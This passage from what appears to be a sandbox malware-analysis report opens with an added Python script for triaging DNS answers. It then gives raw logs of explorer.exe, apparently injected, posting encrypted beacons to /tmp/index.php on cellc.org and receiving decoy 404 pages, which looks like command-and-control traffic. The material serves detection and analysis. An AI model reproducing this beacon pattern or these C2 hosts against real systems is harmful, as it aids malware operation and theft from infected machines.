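The DNS answers above are the kind of table an analyst triages by hand: the same cellc.org response (transaction ID 0x8009, ten A records in ten unrelated /16s) is logged three times, blank-dvgxd.in comes back NXDOMAIN, and geoplugin.net / ip-api.com are the geolocation lookups. The script below is an added example, not part of the Joe Sandbox report, that groups the flattened per-address rows by name, collapses repeated responses by (timestamp, transaction ID), and flags NXDOMAINs and names resolving to many addresses spread over many /8s. The rows are transcribed from the table above; the thresholds `min_addrs` and `min_slash8` are assumptions chosen for illustration.

```python
"""Triage of sandbox DNS answers (added example; rows transcribed from the
report above, thresholds are the author's assumptions)."""
from collections import defaultdict
from ipaddress import ip_address

# Ten A records returned for cellc.org, as listed in the report.
CELLC_ADDRS = ["179.159.229.64", "181.47.131.246", "186.13.17.220",
               "95.158.162.200", "190.145.136.42", "211.181.24.132",
               "189.189.229.237", "190.28.110.209", "201.233.78.169",
               "95.86.30.3"]

# (timestamp, transaction id, reply code, name, address); 'none' is what the
# report prints in the address column of an NXDOMAIN answer.
ROWS = (
    [("16:41:03.561192036", "0x8009", "No error (0)", "cellc.org", a) for a in CELLC_ADDRS]
    + [("16:41:03.561422110", "0x8009", "No error (0)", "cellc.org", a) for a in CELLC_ADDRS]
    + [("16:41:03.561502934", "0x8009", "No error (0)", "cellc.org", a) for a in CELLC_ADDRS]
    + [("16:41:10.449239016", "0x8926", "No error (0)", "makemoneyminds.com", "65.108.69.93"),
       ("16:41:10.584939957", "0x8926", "No error (0)", "makemoneyminds.com", "65.108.69.93"),
       ("16:41:29.428303003", "0x8807", "Name error (3)", "blank-dvgxd.in", "none"),
       ("16:41:35.676626921", "0x3dca", "No error (0)", "geoplugin.net", "178.237.33.50"),
       ("16:41:36.992717028", "0xafc4", "No error (0)", "ip-api.com", "208.95.112.1")]
)


def rcode_of(reply):
    """'Name error (3)' -> 3: the numeric RCODE the report prints in parentheses."""
    return int(reply[reply.rindex("(") + 1:reply.rindex(")")])


def summarize(rows):
    """Group per-address rows by queried name; one response = one (timestamp, txid)."""
    by_name = defaultdict(lambda: {"rcode": 0, "addresses": set(), "responses": set()})
    for ts, txid, reply, name, addr in rows:
        entry = by_name[name]
        entry["rcode"] = rcode_of(reply)
        entry["responses"].add((ts, txid))
        if addr != "none":
            entry["addresses"].add(str(ip_address(addr)))  # validates the literal
    return by_name


def triage(summary, min_addrs=5, min_slash8=4):
    """Return (name, reason) for NXDOMAINs and for names with many, spread-out A records."""
    findings = []
    for name, e in sorted(summary.items()):
        if e["rcode"] == 3:
            findings.append((name, "NXDOMAIN: name did not resolve"))
            continue
        slash8 = {a.split(".")[0] for a in e["addresses"]}
        if len(e["addresses"]) >= min_addrs and len(slash8) >= min_slash8:
            findings.append((name, f"{len(e['addresses'])} A records across "
                                   f"{len(slash8)} distinct /8s in "
                                   f"{len(e['responses'])} response(s)"))
    return findings


if __name__ == "__main__":
    for name, reason in triage(summarize(ROWS)):
        print(f"{name:20s} {reason}")
```

The address-diversity check is deliberately crude (first octet only); it is there to surface the cellc.org answer for a closer look, not to classify it. Note that the sandbox resolver is 1.1.1.1, so the three identical cellc.org responses are three separate replies logged within a millisecond, not duplicated rows.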
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:03.912734985 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ywleoxljcxyhv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 244
Host: cellc.org
May 8, 2024 16:41:03.912771940 CEST | 244 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 48 c7 93
Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA .[k,vu8H__UQis44=`g0zBdx7'!.SLoh8b1_%G}q$--4mjl3M_zsS*
May 8, 2024 16:41:04.977279902 CEST | 177 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Wed, 08 May 2024 14:41:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 03 00 00 00 72 e8 83
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:05.348623991 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://slmlafyecvd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 347
Host: cellc.org
May 8, 2024 16:41:05.348661900 CEST | 347 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5b 08 d8 e6
Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vu[bOtXZF5sXE<g?35nHP2_F6Z/J3gI5~b2/31lNs>'0L]aT ,
May 8, 2024 16:41:06.447591066 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Wed, 08 May 2024 14:41:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:06.812550068 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qiehbuqbrmnvwc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 129
Host: cellc.org
May 8, 2024 16:41:06.812573910 CEST | 129 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 62 48 b0 a6
Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vubH~eIhAF?&8 KD F&
May 8, 2024 16:41:07.918659925 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Wed, 08 May 2024 14:41:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:08.297665119 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://orvskgrekvfetnl.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 177
    Host: cellc.org
May 8, 2024 16:41:08.297687054 CEST | 177 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 7a 54 c0 e0
    Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vuzTK`L}SIQ":_F37\5WW[z<Q3((FP&Th].
May 8, 2024 16:41:09.417098045 CEST | 312 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Wed, 08 May 2024 14:41:09 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 6b 4d f1 35 05 f5 fd 5e fe 97 ec ae 31 da 2d da f5 6c 63 1a 99 98 ac dc 61 d0 37 01 20 9c 0d 98 5c 2b 61 51 ad 94 67 e1 5d aa 4d 04 38 63 28 1e 90 21 a4 71 4d eb 99 28 63 ce 33 c8 f3 ef 39 24 d2 4f b0 5f c7 a5 0f 40 51 3e d6 1b b7 ac 9e 57 d5 99 2e 6b 2a bc a8 a9 c8 b3 84 99 26 bb 1f 18 bc df 99 a0 06 15 30 47 f6 94 b0 00 e7 9e 2d 23 c5 7c 85 fb 4a f3 a9 42 a0
    Data Ascii: #\6kM5^1-lca7 \+aQg]M8c(!qM(c39$O_@Q>W.k*&0G-#|JB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:19.549710035 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://ayiplbxojpvv.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 110
    Host: cellc.org
May 8, 2024 16:41:19.549734116 CEST | 110 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 08 6b 2c 90 f4 76 0b 75 2b 35 e0 a7
    Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA ,[k,vu+59c$dg1
May 8, 2024 16:41:20.656434059 CEST | 510 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Wed, 08 May 2024 14:41:20 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:21.026859999 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://cqileharharpgfrs.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 183
    Host: cellc.org
May 8, 2024 16:41:21.026881933 CEST | 183 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 0e b1 8b
    Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vuP`F[y`r&Ud-~Dv5;H%{3TCSW^&oK7;\
May 8, 2024 16:41:22.106245995 CEST | 510 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Wed, 08 May 2024 14:41:21 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49747 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:22.482662916 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://uyobkmevwtj.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 191
    Host: cellc.org
May 8, 2024 16:41:22.482688904 CEST | 191 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 56 08 b9 bc
    Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vuVBchelJE3Y118N!oNB+<X%NHRb=9_v&yM(
May 8, 2024 16:41:23.576873064 CEST | 510 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Wed, 08 May 2024 14:41:23 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49748 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:23.944554090 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://cnojjwiexgft.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 292
    Host: cellc.org
May 8, 2024 16:41:23.944581985 CEST | 292 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 61 29 cf fe
    Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vua)G<QTN@4:7 tdPdxT5gR=+W*6'!L1u(/X{LB8scglK\9Ex!L0
May 8, 2024 16:41:25.047538042 CEST | 510 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Wed, 08 May 2024 14:41:24 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49749 | 179.159.229.64 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
May 8, 2024 16:41:25.414324999 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://niqqkedjvbevod.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 127
Host: cellc.org
May 8, 2024 16:41:25.414350986 CEST | 127 | OUT | Data Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 24 02 f1 e1
Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vu$3cZnfdC~ryTDqGM
May 8, 2024 16:41:26.490622044 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Wed, 08 May 2024 14:41:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
